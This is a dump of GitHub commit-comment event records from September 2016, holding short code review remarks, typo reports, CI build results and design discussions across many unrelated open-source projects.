{"id":"4503921118","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18867208,"position":null,"line":null,"path":null,"commit_id":"31b2d2154d95e55a9ec3fdf1052de671ceb49593","created_at":"2016-09-01T17:17:59Z","updated_at":"2016-09-01T17:17:59Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/31b2d2154d95e55a9ec3fdf1052de671ceb49593/source/_views/default.html)\n"}},"created_at":"2016-09-01T17:17:59Z"}
{"id":"4503922870","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18867212,"position":null,"line":null,"path":null,"commit_id":"35f9904dbe0600f4e22a4b15909dacb789ffbdab","created_at":"2016-09-01T17:18:19Z","updated_at":"2016-09-01T17:18:19Z","body":"Would it make sense to have duplilcate usernames but with different passwords? Earlier this situation would still be allowed as the initial query would look for the combination and then compare result set count with 1. Now this situation will be rejected as the function will always return false if multiple rows for one username are found."}},"created_at":"2016-09-01T17:18:19Z"}
{"id":"4503924861","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867217,"position":1,"line":1,"path":"lib/getData.js","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:18:43Z","updated_at":"2016-09-01T17:18:43Z","body":"Let's put a linter and choose a lint preset. Se could use standard, which we use internal or use the more popular eslint-config-airbnb."}},"created_at":"2016-09-01T17:18:43Z"}
{"id":"4503930518","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867232,"position":7,"line":7,"path":"package.json","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:19:51Z","updated_at":"2016-09-01T17:19:51Z","body":"add a lint script once we chose a linter"}},"created_at":"2016-09-01T17:19:51Z"}
{"id":"4503931178","type":"CommitCommentEvent","actor":{"login":"joestump"},"repo":{"name":"widhalmt/check_logstash"},"payload":{"comment":{"id":18867235,"position":3,"line":2,"path":"README.md","commit_id":"d72dd20a043f263a8b6b980f031e7ed7de8d4ef8","created_at":"2016-09-01T17:20:00Z","updated_at":"2016-09-01T17:20:00Z","body":"Is this a typo? Looks like only Logstash 5.0+ has the monitoring API?"}},"created_at":"2016-09-01T17:20:00Z"}
{"id":"4503933079","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867244,"position":10,"line":10,"path":"package.json","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:20:22Z","updated_at":"2016-09-01T17:20:22Z","body":"Any other relevant keywords? `Market Identification Code`, `MIC`? Suggestions?"}},"created_at":"2016-09-01T17:20:22Z"}
{"id":"4503938418","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867259,"position":15,"line":15,"path":"package.json","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:21:26Z","updated_at":"2016-09-01T17:21:26Z","body":"Request is already part of request-promise-native"}},"created_at":"2016-09-01T17:21:26Z"}
{"id":"4503939565","type":"CommitCommentEvent","actor":{"login":"emilaxelsson"},"repo":{"name":"koengit/zeldspar"},"payload":{"comment":{"id":18867263,"position":50,"line":50,"path":"examples/noise.hs","commit_id":"e2e7287cba94a2882dde3482bfa13a85b5067617","created_at":"2016-09-01T17:21:40Z","updated_at":"2016-09-01T17:21:40Z","body":"Consider using [`listManifest`](http://hackage.haskell.org/package/raw-feldspar-0.1/docs/Feldspar-Data-Vector.html#v:listManifest) (and indexing) or [`switch`](hackage.haskell.org/package/raw-feldspar-0.1/docs/Feldspar-Frontend.html#v:switch)."}},"created_at":"2016-09-01T17:21:40Z"}
{"id":"4503940198","type":"CommitCommentEvent","actor":{"login":"aholmberg"},"repo":{"name":"stef1927/cassandra"},"payload":{"comment":{"id":18867267,"position":78,"line":597,"path":"doc/native_protocol_v5.spec","commit_id":"4317844fccf3c940d456cc017b69f3485f467f18","created_at":"2016-09-01T17:21:46Z","updated_at":"2016-09-01T17:21:46Z","body":"I think this is a typo. Should it be `0x0008`?"}},"created_at":"2016-09-01T17:21:46Z"}
{"id":"4503941580","type":"CommitCommentEvent","actor":{"login":"sahmed95"},"repo":{"name":"nipy/dipy"},"payload":{"comment":{"id":18867270,"position":17,"line":424,"path":"dipy/reconst/tests/test_ivim.py","commit_id":"b8fcf0b2ae70727495c4401da9897dd1306f56cb","created_at":"2016-09-01T17:22:02Z","updated_at":"2016-09-01T17:22:02Z","body":"Sorry, my bad. I forgot to change this."}},"created_at":"2016-09-01T17:22:02Z"}
{"id":"4503942292","type":"CommitCommentEvent","actor":{"login":"cbroomhead"},"repo":{"name":"finders-not-keepers/finders-not-keepers"},"payload":{"comment":{"id":18867271,"position":null,"line":null,"path":null,"commit_id":"488c977fa14c4eaf1fd7e3b52156f94a3359b906","created_at":"2016-09-01T17:22:10Z","updated_at":"2016-09-01T17:22:10Z","body":"Finder Not Keepers is meant to digitize lost and found bins located at businesses. Too often do we lose our valuables in public places which forces us to go on a frantic search for our lost item. Many phone calls as well as physical visits are required to retrace our steps in the hope of finding our item. Now, with Finders Not Keepers, you can do all of these tedious forensics from the palm of your hand. \r\nUnder the hood, Finders Not Keepers is the best examples of all the modern  tools we have learned in the course of the DecodeMTL bootcamp. On the front-end, we used HTML5, Bootstrap, and React. While on the backend we used ExpressJS, MySql, and third party tools like Auth0 and AWS S3."}},"created_at":"2016-09-01T17:22:10Z"}
{"id":"4503944533","type":"CommitCommentEvent","actor":{"login":"jyotishsolutions"},"repo":{"name":"mmjyothi/CloudformationExercises"},"payload":{"comment":{"id":18867278,"position":null,"line":null,"path":null,"commit_id":"525f4b528b5aa6058c81e21f531cb8fee9741e55","created_at":"2016-09-01T17:22:35Z","updated_at":"2016-09-01T17:22:35Z","body":"dfdfdf"}},"created_at":"2016-09-01T17:22:35Z"}
{"id":"4503947082","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867282,"position":3,"line":3,"path":"README.md","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:23:02Z","updated_at":"2016-09-01T17:23:02Z","body":"Feel like we should spell out what mics stand for, something like **M**arket **I**dentification **C**odes (mics)."}},"created_at":"2016-09-01T17:23:02Z"}
{"id":"4503955491","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867304,"position":1,"line":1,"path":"test.js","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:24:42Z","updated_at":"2016-09-01T17:24:42Z","body":"Do we want to add any real tests? Very basic ones, like making sure mics is an array and data['XYNS'] is defined? We could simple use mocha or jasmine and add an npm script."}},"created_at":"2016-09-01T17:24:42Z"}
{"id":"4503955909","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18867307,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T17:24:47Z","updated_at":"2016-09-01T17:24:47Z","body":"> XMonad can be used not only as standalone WM but as WM for some DE. In that case DE's panel can start earlier than xmonad. Using xmonad --replace could be another case.\r\n\r\nAnd in all these cases the original code worked properly, without requiring a startupHook. I'm asking when/why did it become necessary.\r\n\r\n> Yes, it can be a global thing in many users' configs(I haven't seen anyone using avoidStrutsOn) but in the case when user has one layout with avoidStrutsOn [U] and other with avoidStrutsOn [L], the cache should be per-layout.\r\n\r\nOkay, the cache is a per-instance thing, but smap isn't. But it's only updated in the current layout instance by messages. So at least this should be a global thing.\r\n\r\n> Yes, that's true. And I think it'll be better option to add function setLayoutAndUpdateDocks for that.\r\n\r\nI think that'd be a VERY VERY bad idea. Please don't do this. ManageDocks should just be made to work without bizarre stupid hacks in completely unrelated places. If you don't know how to do that, I will. Just PRETTY PLEASE don't make things worse by adding things like setLayoutAndUpdateDocks. Thanks.\r\n\r\nxmonad/xmonad-contrib#76 sounds like the problem I was having. I solved it by having just a single AvoidStruts instance and adding docksStartupHook all over the place, but I'd very much like to have ManageDocks fixed and revert to my original config."}},"created_at":"2016-09-01T17:24:47Z"}
{"id":"4503957000","type":"CommitCommentEvent","actor":{"login":"ChALkeR"},"repo":{"name":"maxogden/concat-stream"},"payload":{"comment":{"id":18867312,"position":null,"line":null,"path":null,"commit_id":"3e285ba5e5b10b7c98552217f5c1023829efe69e","created_at":"2016-09-01T17:24:59Z","updated_at":"2016-09-01T17:24:59Z","body":"This was filed as a public report and was disclosed but not fixed for 13 days?\r\nI sent a private report for a reason, not sure why this was handled this way.\r\n\r\nBtw, @maxogden, what about 1.4.x?"}},"created_at":"2016-09-01T17:24:59Z"}
{"id":"4503957301","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18867313,"position":null,"line":null,"path":null,"commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T17:25:03Z","updated_at":"2016-09-01T17:25:03Z","body":"Good point, it repopulates now! \r\n\r\nhttps://github.com/umbraco/OurUmbraco/commit/3f61b8c9036ad73cc582bf26ba2025c80770a212"}},"created_at":"2016-09-01T17:25:03Z"}
{"id":"4503959053","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18867325,"position":null,"line":null,"path":null,"commit_id":"c487d5f0f17b3460b2b29d46857facff6c07dce8","created_at":"2016-09-01T17:25:24Z","updated_at":"2016-09-01T17:25:24Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.237.c487d5f0f17b3460b2b29d46857facff6c07dce8](http://build.palaso.org/viewLog.html?buildId=76368&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1493, ignored: 17 Build time: 00:07:20"}},"created_at":"2016-09-01T17:25:24Z"}
{"id":"4503960261","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867328,"position":7,"line":7,"path":"package.json","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:25:37Z","updated_at":"2016-09-01T17:25:37Z","body":"I'd replace getData by build, which is basically what we're doing by importing the files, right?"}},"created_at":"2016-09-01T17:25:37Z"}
{"id":"4503966375","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18867344,"position":null,"line":null,"path":null,"commit_id":"c7308f864e92bcf2fd7f355153792cdb62273afb","created_at":"2016-09-01T17:26:51Z","updated_at":"2016-09-01T17:26:51Z","body":"👍 "}},"created_at":"2016-09-01T17:26:51Z"}
{"id":"4503966755","type":"CommitCommentEvent","actor":{"login":"richardcurteis"},"repo":{"name":"richardcurteis/Lean"},"payload":{"comment":{"id":18867345,"position":null,"line":null,"path":null,"commit_id":"cf37214bebbbac03911a1ff2faed41146f25ba9c","created_at":"2016-09-01T17:26:55Z","updated_at":"2016-09-01T17:26:55Z","body":"Added FXCM holidays. They are closed on 25th and 26th of December as well as 1st and 2nd of January. Including when those dates fall into normal trading hours.\r\nScreenshot of chat with Fxcm support is attached.\r\n![fxcm conversation](https://cloud.githubusercontent.com/assets/6715506/18177325/a4cf0fd0-7071-11e6-9899-4f2a52f38e51.png)\r\n"}},"created_at":"2016-09-01T17:26:55Z"}
{"id":"4503967519","type":"CommitCommentEvent","actor":{"login":"lemonboston"},"repo":{"name":"dmfs/http-client-essentials-suite"},"payload":{"comment":{"id":18867350,"position":5,"line":17,"path":".idea/misc.xml","commit_id":"aed8d781282c305102ee3f16ab69d7fb74d28dad","created_at":"2016-09-01T17:27:05Z","updated_at":"2016-09-01T17:27:05Z","body":"I didn't do anything with them explicitly, IntelliJ changed it and I overlooked it, sorry, as I wanted to just allow it to modify its own files, thought something related to module dependency changes.\r\nI pushed a revert of these changes in misc.xml."}},"created_at":"2016-09-01T17:27:05Z"}
{"id":"4503967612","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-client-ruby"},"payload":{"comment":{"id":18867351,"position":null,"line":null,"path":null,"commit_id":"46f06f4c25c9f4ec0e820f23413ec86ecc7521a4","created_at":"2016-09-01T17:27:06Z","updated_at":"2016-09-01T17:27:06Z","body":"👍 "}},"created_at":"2016-09-01T17:27:06Z"}
{"id":"4503968513","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-client-ruby"},"payload":{"comment":{"id":18867353,"position":null,"line":null,"path":null,"commit_id":"7da51ef4dbacf20ee38398d33bf39e2f5188a04a","created_at":"2016-09-01T17:27:15Z","updated_at":"2016-09-01T17:27:15Z","body":"👍 "}},"created_at":"2016-09-01T17:27:15Z"}
{"id":"4503969647","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-integration-tests"},"payload":{"comment":{"id":18867358,"position":null,"line":null,"path":null,"commit_id":"b3c0b0b94eb60c0a38cdec82ec24fddd0eda120a","created_at":"2016-09-01T17:27:29Z","updated_at":"2016-09-01T17:27:29Z","body":"👍 "}},"created_at":"2016-09-01T17:27:29Z"}
{"id":"4503971974","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867367,"position":6,"line":89,"path":"app/controllers/kaui/admin_tenants_controller.rb","commit_id":"a00ab91b138911800b80b857508c20337f6758cb","created_at":"2016-09-01T17:27:57Z","updated_at":"2016-09-01T17:27:57Z","body":"Nit: could be a on-liner:\r\n\r\n```\r\nKaui::Overdue::get_overdue_json(options) rescue []\r\n```"}},"created_at":"2016-09-01T17:27:57Z"}
{"id":"4503973427","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867373,"position":6,"line":6,"path":"app/models/kaui/overdue.rb","commit_id":"a00ab91b138911800b80b857508c20337f6758cb","created_at":"2016-09-01T17:28:15Z","updated_at":"2016-09-01T17:28:15Z","body":"Nit: extra variable."}},"created_at":"2016-09-01T17:28:15Z"}
{"id":"4503974000","type":"CommitCommentEvent","actor":{"login":"DreadKnight"},"repo":{"name":"FreezingMoon/AncientBeast"},"payload":{"comment":{"id":18867376,"position":null,"line":null,"path":null,"commit_id":"7f844d28637972cc3c7b61dbbae71555b5a3aad9","created_at":"2016-09-01T17:28:20Z","updated_at":"2016-09-01T17:28:20Z","body":"The term vignette is used a bit confusing here, as by definition they're drawings without well defined borders, which is not the case here. Hence why using *avatar* or *creature*.\r\n\r\nNice patch, I like the animations now! :heart:"}},"created_at":"2016-09-01T17:28:20Z"}
{"id":"4503974542","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18867379,"position":null,"line":null,"path":null,"commit_id":"213160652e00deff3ffbba125d427d7a14ed3673","created_at":"2016-09-01T17:28:26Z","updated_at":"2016-09-01T17:28:26Z","body":"Hi Athoik,\r\n\r\nI have merge your commit into the Dev branch of my enigma2. \r\nBranch here: https://github.com/Huevos/enigma2/commits/Dev\r\nCommit here: https://github.com/Huevos/enigma2/commit/88b4752c5e30454d1ee529ec24595967c4e97102\r\n\r\nTried on the OS Mini Plus. \r\nIf I configure the tuner to T2 all S2 services are greyed out.\r\nIf I configure the tuner to S2 all T2 services are greyed out.\r\n\r\nPlease could you advise me what could be wrong?"}},"created_at":"2016-09-01T17:28:26Z"}
{"id":"4503975631","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867382,"position":12,"line":12,"path":"app/views/kaui/admin_tenants/_show_overdue.erb","commit_id":"a00ab91b138911800b80b857508c20337f6758cb","created_at":"2016-09-01T17:28:39Z","updated_at":"2016-09-01T17:28:39Z","body":"Extra line?"}},"created_at":"2016-09-01T17:28:39Z"}
{"id":"4503979197","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867394,"position":null,"line":null,"path":null,"commit_id":"a00ab91b138911800b80b857508c20337f6758cb","created_at":"2016-09-01T17:29:18Z","updated_at":"2016-09-01T17:29:18Z","body":"👍 "}},"created_at":"2016-09-01T17:29:18Z"}
{"id":"4503979902","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18867396,"position":null,"line":null,"path":null,"commit_id":"0c22ac5d93386175399ff0165f96f75c0038d5b3","created_at":"2016-09-01T17:29:27Z","updated_at":"2016-09-01T17:29:27Z","body":"👍 "}},"created_at":"2016-09-01T17:29:27Z"}
{"id":"4503982782","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867404,"position":71,"line":38,"path":"app/views/kaui/admin_tenants/_show_overdue_simple.erb","commit_id":"051a5a9051236d48e119e4ab41b18beb82df930b","created_at":"2016-09-01T17:30:02Z","updated_at":"2016-09-01T17:30:02Z","body":"Nit: extra space."}},"created_at":"2016-09-01T17:30:02Z"}
{"id":"4503987853","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867410,"position":36,"line":12,"path":"app/views/kaui/admin_tenants/_show_overdue_simple.erb","commit_id":"051a5a9051236d48e119e4ab41b18beb82df930b","created_at":"2016-09-01T17:31:00Z","updated_at":"2016-09-01T17:31:00Z","body":"Nit: logic could be in model (e.g. `@overdue.has_overdue_states?`)."}},"created_at":"2016-09-01T17:31:00Z"}
{"id":"4503990755","type":"CommitCommentEvent","actor":{"login":"Taloth"},"repo":{"name":"Awarua-/Sonarr"},"payload":{"comment":{"id":18867420,"position":null,"line":null,"path":null,"commit_id":"e6e35ea14ac1c0bd99918abcdd25529f63b497a1","created_at":"2016-09-01T17:31:32Z","updated_at":"2016-09-01T17:31:32Z","body":"I would just roll the `return new TimeSpan` into the switch cases separately, so you don't need those local variables and index arithmetic.\r\nIn addition `reader.Value.ToString().Split(':').Select(int.Parse).ToArray` might be a good change. saves you several int.Parse \r\n\r\nAs for tests, it would be neat to add a `SabnzbdQueueTimeConverterFixture` to explicitly test the various scenario's, i'm sure there's a fixture you can copy for convenience. Based on the sabnzbd code: `9:32` `19:32` `5:02:12` `40:12:14` `14:23:59:59`.\r\nI won't reject the PR over that, just for bonus points :smile:\r\n\r\nOn a final note, the format `days.hours:minutes:seconds` is more common in the industry and has a lower chance of ambiguity. It might be worth proposing that to sabnzbd as alternative. Then you can use TimeSpan.Parse afaik.... maybe I should've led with that."}},"created_at":"2016-09-01T17:31:32Z"}
{"id":"4503991266","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18867422,"position":null,"line":null,"path":null,"commit_id":"051a5a9051236d48e119e4ab41b18beb82df930b","created_at":"2016-09-01T17:31:38Z","updated_at":"2016-09-01T17:31:38Z","body":"👍 \r\n\r\nMight be worth down the line adding basic integration tests for these new views, just to make sure they load properly."}},"created_at":"2016-09-01T17:31:38Z"}
{"id":"4503991677","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867424,"position":null,"line":null,"path":null,"commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:31:43Z","updated_at":"2016-09-01T17:31:43Z","body":"Great solution, I like it, even with my nitpicking... :)\r\n\r\nI'd also add a LICENSE.md as documented here: https://help.github.com/articles/open-source-licensing/"}},"created_at":"2016-09-01T17:31:43Z"}
{"id":"4503991946","type":"CommitCommentEvent","actor":{"login":"amir73il"},"repo":{"name":"albamc/docker"},"payload":{"comment":{"id":18867426,"position":41,"line":179,"path":"daemon/graphdriver/overlay/overlay.go","commit_id":"6f7b1d025cb414492bc5c0c274d49268062c19ee","created_at":"2016-09-01T17:31:47Z","updated_at":"2016-09-01T17:31:47Z","body":"I guess parsing of xfs quota options should be done in a function in quota.go?\r\nlook at what I did in my PR. a function that parses all xfs.* options and ignores the rest.\r\nor maybe not, I am sure sure how docker developers would like that to be??"}},"created_at":"2016-09-01T17:31:47Z"}
{"id":"4503995332","type":"CommitCommentEvent","actor":{"login":"pokey909"},"repo":{"name":"soundcloud/skippyHLS"},"payload":{"comment":{"id":18867433,"position":null,"line":null,"path":null,"commit_id":"abd685ce0f521524b7d887e8a1f54c4873fa5f8e","created_at":"2016-09-01T17:32:27Z","updated_at":"2016-09-01T17:32:27Z","body":"👍 "}},"created_at":"2016-09-01T17:32:27Z"}
{"id":"4503997653","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18867439,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T17:32:54Z","updated_at":"2016-09-01T17:32:54Z","body":"On Thu, Sep 1, 2016 at 1:24 PM, Tomáš Janoušek <notifications@github.com>\nwrote:\n\n> And in all these cases the original code worked properly, without\n> requiring a startupHook. I'm asking when/why did it become necessary.\n\n\nBecause avoidStruts was iterating through every window via XQueryTree every\ntime the layout ran, in order to find the few that had struts. This is\n*extremely* expensive if you have many windows open, although as you note\nit did work reliably. We would like xmonad to be usable with many windows\nas well as with few windows.\n\n-- \nbrandon s allbery kf8nh                               sine nomine associates\nallbery.b@gmail.com                                  ballbery@sinenomine.net\nunix, openafs, kerberos, infrastructure, xmonad        http://sinenomine.net\n"}},"created_at":"2016-09-01T17:32:54Z"}
{"id":"4504000112","type":"CommitCommentEvent","actor":{"login":"Supercool123"},"repo":{"name":"Supercool123/pixicon"},"payload":{"comment":{"id":18867447,"position":null,"line":null,"path":null,"commit_id":"8977993e14a712ee5060253e0f75cd6c6904c926","created_at":"2016-09-01T17:33:24Z","updated_at":"2016-09-01T17:33:24Z","body":"[updation.zip](https://github.com/Supercool123/pixicon/files/450339/updation.zip)\r\n"}},"created_at":"2016-09-01T17:33:24Z"}
{"id":"4504000118","type":"CommitCommentEvent","actor":{"login":"amir73il"},"repo":{"name":"albamc/docker"},"payload":{"comment":{"id":18867448,"position":41,"line":179,"path":"daemon/graphdriver/overlay/overlay.go","commit_id":"6f7b1d025cb414492bc5c0c274d49268062c19ee","created_at":"2016-09-01T17:33:24Z","updated_at":"2016-09-01T17:33:24Z","body":"or maybe use the standard size= option like I did in my PR and have no xfs specific options?"}},"created_at":"2016-09-01T17:33:24Z"}
{"id":"4504000676","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18867451,"position":83,"line":256,"path":"XMonad/Hooks/ManageDocks.hs","commit_id":"a5e87e38940190a363ee7b90595816e74e468488","created_at":"2016-09-01T17:33:30Z","updated_at":"2016-09-01T17:33:30Z","body":"Actually sset is likely to be invalid regardless of whether cache is Just or Nothing. Never mind the above comment."}},"created_at":"2016-09-01T17:33:30Z"}
{"id":"4504004321","type":"CommitCommentEvent","actor":{"login":"Supercool123"},"repo":{"name":"Supercool123/pixicon"},"payload":{"comment":{"id":18867458,"position":null,"line":null,"path":null,"commit_id":"8977993e14a712ee5060253e0f75cd6c6904c926","created_at":"2016-09-01T17:34:14Z","updated_at":"2016-09-01T17:34:14Z","body":"[Last_updation.zip](https://github.com/Supercool123/pixicon/files/450349/Last_updation.zip)\r\n"}},"created_at":"2016-09-01T17:34:14Z"}
{"id":"4504005976","type":"CommitCommentEvent","actor":{"login":"ant1b"},"repo":{"name":"PabloRodenas/b2note"},"payload":{"comment":{"id":18867463,"position":null,"line":null,"path":null,"commit_id":"84feac5e965e4521de14c8f8cc8a46a9861925d2","created_at":"2016-09-01T17:34:31Z","updated_at":"2016-09-01T17:34:31Z","body":"Missing end word: \"namespace:\r\nRedirections pointing to the father URL for avoiding api\r\n=> Redirections pointing to the father URL for avoiding api namespace"}},"created_at":"2016-09-01T17:34:31Z"}
{"id":"4504007781","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18867465,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T17:34:52Z","updated_at":"2016-09-01T17:34:52Z","body":"Never mind. I guess, I figured it out. See PR #290 ."}},"created_at":"2016-09-01T17:34:52Z"}
{"id":"4504012711","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18867478,"position":13,"line":13,"path":"README.md","commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T17:35:50Z","updated_at":"2016-09-01T17:35:50Z","body":"\\```javascript will ensure code highlighting"}},"created_at":"2016-09-01T17:35:50Z"}
{"id":"4504013083","type":"CommitCommentEvent","actor":{"login":"ifokkema"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":18867480,"position":33,"line":33,"path":"src/inc-lib-diseases.php","commit_id":"af308da9183b10aa709652e0e029174c5dcb7dd9","created_at":"2016-09-01T17:35:53Z","updated_at":"2016-09-01T17:35:53Z","body":"What do you mean with this should be treated as a constant? That LOVD should not change the values for some reason? We have lots of those arrays..."}},"created_at":"2016-09-01T17:35:53Z"}
{"id":"4504017506","type":"CommitCommentEvent","actor":{"login":"jackpot51"},"repo":{"name":"rust-lang/libc"},"payload":{"comment":{"id":18867498,"position":null,"line":null,"path":null,"commit_id":"94f495d131e168bc4e4234dbea48196db5303753","created_at":"2016-09-01T17:36:45Z","updated_at":"2016-09-01T17:36:45Z","body":"Yeah, that was a mistake."}},"created_at":"2016-09-01T17:36:45Z"}
{"id":"4504017716","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18867499,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T17:36:47Z","updated_at":"2016-09-01T17:36:47Z","body":"@mikeller Just for the sake of the idea: Lets assume we take the opportunity for an Multi-OLRS protocol: There we choose 57600 baud 8e1 that is supported by SoftSerial very good. We would have a maximum update rate still of 288hz which is sufficient.\r\nIf you could send me a sample Multiprotocal samples, I can test if that would work!"}},"created_at":"2016-09-01T17:36:47Z"}
{"id":"4504019233","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18867506,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T17:37:07Z","updated_at":"2016-09-01T17:37:07Z","body":"@geekosaur By when/why, I was looking for a commit sha with would explain the why. But thanks for the answer anyway. :-)"}},"created_at":"2016-09-01T17:37:07Z"}
{"id":"4504021359","type":"CommitCommentEvent","actor":{"login":"siddharth51292"},"repo":{"name":"Rpedigree/pedigreeR"},"payload":{"comment":{"id":18867515,"position":null,"line":null,"path":null,"commit_id":"fa5cd8782629856052473f775f33c7cb272ff134","created_at":"2016-09-01T17:37:30Z","updated_at":"2016-09-01T17:37:30Z","body":"Updated Examples 1 - 4 "}},"created_at":"2016-09-01T17:37:30Z"}
{"id":"4504022948","type":"CommitCommentEvent","actor":{"login":"vbarbaresi"},"repo":{"name":"aldebaran/qibuild"},"payload":{"comment":{"id":18867527,"position":2,"line":2,"path":"qiproject.xml","commit_id":"c8e9995002bb5b4cc6992f5cefe88c48dca5d9d3","created_at":"2016-09-01T17:37:48Z","updated_at":"2016-09-01T17:37:48Z","body":":cry: "}},"created_at":"2016-09-01T17:37:48Z"}
{"id":"4504029615","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/engagement-l10n"},"payload":{"comment":{"id":18867549,"position":20,"line":18,"path":"it/heartbeat/2016/sep2016.lang","commit_id":"2bd557fdf3b3c7d0d54ec32e8b509c106161f4f7","created_at":"2016-09-01T17:39:09Z","updated_at":"2016-09-01T17:39:09Z","body":"Doppia \"e e le password\".\r\nAlternativa\r\n>Porta segnalibri e password su Firefox per iOS e Android"}},"created_at":"2016-09-01T17:39:09Z"}
{"id":"4504030794","type":"CommitCommentEvent","actor":{"login":"intrauterino"},"repo":{"name":"Lordmau5/Tidown"},"payload":{"comment":{"id":18867553,"position":null,"line":null,"path":null,"commit_id":"368be3c8f0c17b577ad6b9dc7e5dcc62dedf63b2","created_at":"2016-09-01T17:39:22Z","updated_at":"2016-09-01T17:39:22Z","body":"use the operating system is Windows 8.1"}},"created_at":"2016-09-01T17:39:22Z"}
